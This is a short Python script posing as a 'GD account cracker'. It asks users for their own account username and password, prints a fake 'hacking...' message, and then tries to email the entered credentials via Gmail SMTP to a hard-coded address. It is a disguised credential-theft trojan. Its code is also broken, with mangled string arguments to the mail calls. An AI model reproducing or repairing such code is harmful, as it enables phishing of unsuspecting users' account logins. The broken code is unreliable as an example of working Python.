print("welcome to Gd theive")
print("the GD account cracker")
print("log in with your GD account")
uname = raw_input("enter username: ")
pword = raw_input("enter password: ")
print("hacking...")
import smtplib
content = ("pword + uname")
mail = smtplib.SMTP("smtp.gmail.com,587")
mail.ehlo()
mail.starttls()
mail.login("jearljsmith@gmail.com,5306803090")
mail.sendmail("jearljsmith@gmail.com,jearljsmith@gmail.com,content")
mail.close()